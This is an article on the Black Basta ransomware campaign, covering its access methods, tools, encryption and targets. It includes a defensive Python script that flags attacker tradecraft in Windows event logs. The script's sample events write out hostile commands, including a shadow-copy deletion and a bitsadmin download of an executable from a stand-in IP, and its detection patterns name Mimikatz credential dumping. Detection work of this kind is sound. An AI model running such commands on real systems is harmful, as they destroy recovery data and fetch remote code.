Black Basta Ransomware Targets Critical Infrastructure Globally
The Black Basta ransomware-as-a-service (RaaS) operation has compromised more than 500 private industry and critical infrastructure entities across North America, Europe, and Australia since it first appeared in April 2022. A joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) reports that its affiliates have encrypted and stolen data from organizations in at least 12 of the 16 critical infrastructure sectors.
According to the advisory, Black Basta affiliates typically gain initial access through common techniques such as phishing and exploitation of known vulnerabilities. Once inside, they run a double-extortion play: data is exfiltrated before systems are encrypted, so a victim with good backups can still be pressured with a leak. The ransom notes left after encryption depart from the usual pattern; they contain no ransom amount or payment details, only a unique victim code and instructions to contact the attackers via a .onion URL.
Black Basta first surfaced in April 2022, with early intrusions delivered through the QakBot malware loader, and has since become a persistent presence in the ransomware landscape. Malwarebytes statistics link the group to 28 of the 373 confirmed ransomware attacks in April 2024 alone, consistent with Kaspersky's ranking of Black Basta as the 12th most active ransomware family in 2023. The group's activity is also growing: attacks attributed to it rose 41% in the first quarter of 2024 compared with the previous quarter.
There are indications that Black Basta is connected to the FIN7 cybercrime group, which has shifted its focus toward ransomware since 2020. The affiliates rely largely on commodity and administrative tooling rather than custom malware: SoftPerfect Network Scanner for network reconnaissance; BITSAdmin, Cobalt Strike, ConnectWise ScreenConnect, and PsExec for tool transfer and lateral movement; and Mimikatz for credential theft and privilege escalation. They have also exploited known Windows and Active Directory vulnerabilities such as ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527) to obtain elevated privileges, so environments that have not patched these years-old flaws remain soft targets.
In some intrusions the attackers deployed Backstab, a tool that terminates endpoint detection and response (EDR) processes; the same tool has been used by other ransomware operations, including LockBit. Because EDR is disabled shortly before encryption, detection has to rely on the earlier, noisier stages of the intrusion (reconnaissance, credential theft, lateral movement) rather than on the encryptor itself. Files are encrypted with ChaCha20, with an RSA-4096 public key protecting the symmetric key material, and volume shadow copies are deleted beforehand so that the host cannot be restored from local snapshots; offline or immutable backups are unaffected by this step.
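A triage script, added here as an example that is not part of the advisory or of any Black Basta tooling, that flags the tradecraft described in the two paragraphs above (shadow copy deletion, PsExec service installs, BITSAdmin transfers, SoftPerfect netscan, Mimikatz) across constructed Windows process-creation and service-install events. The event field names (Computer, EventID, Image, CommandLine, ImagePath, ServiceName), the sample records, and the rule names are assumptions; the commands they mimic are the ones named on this page.

```python
"""
Triage helper: flag Black Basta-style tradecraft in Windows process-creation
and service-install events.

Added example, not advisory or group tooling. Input records are constructed
to resemble Sysmon EventID 1 (process create) and System EventID 7045
(service installed) after JSON flattening; the field names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str       # intrusion phase the rule corresponds to
    pattern: re.Pattern  # matched case-insensitively against image + command line


RULES = [
    Rule("shadow_copy_deletion", "recovery inhibition",
         re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("psexec_lateral_movement", "lateral movement",
         re.compile(r"\bpsexe(c|svc)(\.exe)?\b", re.I)),
    Rule("bitsadmin_transfer", "tool transfer",
         re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.I)),
    Rule("softperfect_netscan", "network reconnaissance",
         re.compile(r"\bnetscan(64)?\.exe\b", re.I)),
    Rule("mimikatz_credential_dump", "privilege escalation",
         re.compile(r"mimikatz|sekurlsa::|lsadump::", re.I)),
]


def _text(event: dict) -> str:
    # Normalise the fields of interest into one string: 7045 events carry the
    # binary path in ImagePath, Sysmon 1 events in Image/CommandLine.
    return " ".join(str(event.get(k, "")) for k in ("Image", "CommandLine", "ImagePath", "ServiceName"))


def scan_events(events):
    """Return one alert dict per (event, rule) match, in input order."""
    alerts = []
    for ev in events:
        haystack = _text(ev)
        for rule in RULES:
            if rule.pattern.search(haystack):
                alerts.append({"host": ev.get("Computer"), "event_id": ev.get("EventID"),
                               "rule": rule.name, "technique": rule.technique})
    return alerts


def kill_chain_summary(alerts):
    """Map host -> ordered list of distinct techniques seen on it.
    Several phases on one host is the signal worth escalating; a single hit
    (e.g. an admin running vssadmin) is often noise."""
    out = {}
    for a in alerts:
        seen = out.setdefault(a["host"], [])
        if a["technique"] not in seen:
            seen.append(a["technique"])
    return out


# Constructed sample events (not real telemetry); hosts and paths are made up.
SAMPLE_EVENTS = [
    {"Computer": "ws01", "EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "ws01", "EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"Computer": "ws01", "EventID": 1, "Image": r"C:\Users\Public\netscan.exe",
     "CommandLine": "netscan.exe /hide /auto:scan.xml"},
    {"Computer": "fs02", "EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job /download /priority high http://203.0.113.10/a.exe C:\\Temp\\a.exe"},
    {"Computer": "dc01", "EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},   # benign, must not match
]

if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for a in hits:
        print(a)
    print(kill_chain_summary(hits))
```

The regexes are deliberately simple and therefore brittle: affiliates routinely rename netscan.exe or PsExec, so in production these string matches should be paired with file hashes, parent-process context, and the command-line arguments rather than the binary name alone. EDR tampering with Backstab is not covered because the page names no host artifact for it.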
The healthcare sector stands out as a prime target for Black Basta: it depends heavily on connected systems, holds large volumes of sensitive personal health information, and suffers immediate consequences for patient care when those systems go down. Black Basta is not the only active campaign; CACTUS, for example, has been exploiting vulnerabilities in Qlik Sense to break into organizations.
Analysis from NCC Group indicates that thousands of exposed servers remain unpatched and open to such exploitation. Although the total number of recorded ransomware attacks fell 18% in Q1 2024, the threat has not receded; organizations face a mix of established groups and newer entrants.
Recent assessments by cybersecurity firm ReliaQuest point to rebranding within the ransomware ecosystem, suggesting that the DarkVault group may be a successor to LockBit given similarities in branding. As ransomware tactics diversify, organizations need a clear picture of which groups are active and which exposed, unpatched services are likely to be their way in.
In summary, the Black Basta campaign illustrates the pressure on critical industries worldwide. The group succeeds with widely available tools and long-patched vulnerabilities rather than novel exploits, which underscores that timely patching, credential hygiene, monitoring of administrative tooling, and tested offline backups remain the core defenses against this kind of cybercrime.